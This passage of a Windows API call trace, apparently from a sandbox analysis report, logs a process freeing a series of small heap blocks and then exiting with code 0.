Flags=0x0, MemoryPointer=0x4753828) returned 0x24 [0268.249] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x4753828 | out: hHeap=0x4750000) returned 1 [0268.249] GetProcessHeap () returned 0x4750000 [0268.249] GetProcessHeap () returned 0x4750000 [0268.249] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c3a8) returned 1 [0268.249] GetProcessHeap () returned 0x4750000 [0268.249] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475c3a8) returned 0x14 [0268.249] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c3a8 | out: hHeap=0x4750000) returned 1 [0268.249] GetProcessHeap () returned 0x4750000 [0268.249] GetProcessHeap () returned 0x4750000 [0268.249] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x4756ee0) returned 1 [0268.249] GetProcessHeap () returned 0x4750000 [0268.249] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x4756ee0) returned 0x4c [0268.250] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x4756ee0 | out: hHeap=0x4750000) returned 1 [0268.250] GetProcessHeap () returned 0x4750000 [0268.250] GetProcessHeap () returned 0x4750000 [0268.250] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c108) returned 1 [0268.250] GetProcessHeap () returned 0x4750000 [0268.250] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475c108) returned 0x14 [0268.250] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c108 | out: hHeap=0x4750000) returned 1 [0268.250] GetProcessHeap () returned 0x4750000 [0268.250] GetProcessHeap () returned 0x4750000 [0268.250] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x4757378) returned 1 [0268.250] GetProcessHeap () returned 0x4750000 [0268.250] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x4757378) returned 0x10 [0268.250] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x4757378 | out: hHeap=0x4750000) returned 1 [0268.250] GetProcessHeap () returned 0x4750000 [0268.250] GetProcessHeap () returned 0x4750000 [0268.250] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x47589c8) returned 1 [0268.250] GetProcessHeap () returned 0x4750000 [0268.251] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x47589c8) returned 0x14 [0268.251] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x47589c8 | out: hHeap=0x4750000) returned 1 [0268.251] GetProcessHeap () returned 0x4750000 [0268.251] GetProcessHeap () returned 0x4750000 [0268.251] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x47589e8) returned 1 [0268.251] GetProcessHeap () returned 0x4750000 [0268.251] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x47589e8) returned 0x14 [0268.251] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x47589e8 | out: hHeap=0x4750000) returned 1 [0268.251] GetProcessHeap () returned 0x4750000 [0268.251] GetProcessHeap () returned 0x4750000 [0268.251] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x4757910) returned 1 [0268.251] GetProcessHeap () returned 0x4750000 [0268.251] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x4757910) returned 0x14 [0268.251] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x4757910 | out: hHeap=0x4750000) returned 1 [0268.251] GetProcessHeap () returned 0x4750000 [0268.251] GetProcessHeap () returned 0x4750000 [0268.251] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x4757930) returned 1 [0268.251] GetProcessHeap () returned 0x4750000 [0268.251] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x4757930) returned 0x14 [0268.251] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x4757930 | out: hHeap=0x4750000) returned 1 [0268.251] GetProcessHeap () returned 0x4750000 [0268.251] GetProcessHeap () returned 0x4750000 [0268.251] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x47574e0) returned 1 [0268.251] GetProcessHeap () returned 0x4750000 [0268.252] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x47574e0) returned 0x10 [0268.252] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x47574e0 | out: hHeap=0x4750000) returned 1 [0268.252] GetProcessHeap () returned 0x4750000 [0268.252] GetProcessHeap () returned 0x4750000 [0268.252] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c348) returned 1 [0268.252] GetProcessHeap () returned 0x4750000 [0268.252] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475c348) returned 0x14 [0268.252] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c348 | out: hHeap=0x4750000) returned 1 [0268.252] GetProcessHeap () returned 0x4750000 [0268.252] GetProcessHeap () returned 0x4750000 [0268.252] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c248) returned 1 [0268.252] GetProcessHeap () returned 0x4750000 [0268.252] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475c248) returned 0x14 [0268.252] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c248 | out: hHeap=0x4750000) returned 1 [0268.252] GetProcessHeap () returned 0x4750000 [0268.252] GetProcessHeap () returned 0x4750000 [0268.252] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c2c8) returned 1 [0268.252] GetProcessHeap () returned 0x4750000 [0268.252] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475c2c8) returned 0x14 [0268.252] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c2c8 | out: hHeap=0x4750000) returned 1 [0268.252] GetProcessHeap () returned 0x4750000 [0268.252] GetProcessHeap () returned 0x4750000 [0268.252] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c468) returned 1 [0268.252] GetProcessHeap () returned 0x4750000 [0268.252] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475c468) returned 0x14 [0268.253] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c468 | out: hHeap=0x4750000) returned 1 [0268.253] GetProcessHeap () returned 0x4750000 [0268.253] GetProcessHeap () returned 0x4750000 [0268.253] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c2e8) returned 1 [0268.253] GetProcessHeap () returned 0x4750000 [0268.253] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475c2e8) returned 0x14 [0268.253] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c2e8 | out: hHeap=0x4750000) returned 1 [0268.253] GetProcessHeap () returned 0x4750000 [0268.253] GetProcessHeap () returned 0x4750000 [0268.253] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c268) returned 1 [0268.253] GetProcessHeap () returned 0x4750000 [0268.253] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475c268) returned 0x14 [0268.253] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c268 | out: hHeap=0x4750000) returned 1 [0268.253] GetProcessHeap () returned 0x4750000 [0268.253] GetProcessHeap () returned 0x4750000 [0268.253] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c3e8) returned 1 [0268.253] GetProcessHeap () returned 0x4750000 [0268.253] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475c3e8) returned 0x14 [0268.253] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c3e8 | out: hHeap=0x4750000) returned 1 [0268.253] GetProcessHeap () returned 0x4750000 [0268.253] GetProcessHeap () returned 0x4750000 [0268.253] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x47573d8) returned 1 [0268.253] GetProcessHeap () returned 0x4750000 [0268.253] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x47573d8) returned 0x10 [0268.253] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x47573d8 | out: hHeap=0x4750000) returned 1 [0268.253] GetProcessHeap () returned 0x4750000 [0268.254] GetProcessHeap () returned 0x4750000 [0268.254] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c388) returned 1 [0268.254] GetProcessHeap () returned 0x4750000 [0268.254] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x475c388) returned 0x14 [0268.254] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x475c388 | out: hHeap=0x4750000) returned 1 [0268.254] GetProcessHeap () returned 0x4750000 [0268.254] GetProcessHeap () returned 0x4750000 [0268.254] HeapValidate (hHeap=0x4750000, dwFlags=0x0, lpMem=0x4757480) returned 1 [0268.254] GetProcessHeap () returned 0x4750000 [0268.254] RtlSizeHeap (HeapHandle=0x4750000, Flags=0x0, MemoryPointer=0x4757480) returned 0x10 [0268.254] HeapFree (in: hHeap=0x4750000, dwFlags=0x0, lpMem=0x4757480 | out: hHeap=0x4750000) returned 1 [0268.254] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0268.254] exit (_Code=0) Thread: id = 18 os_tid = 0x9d8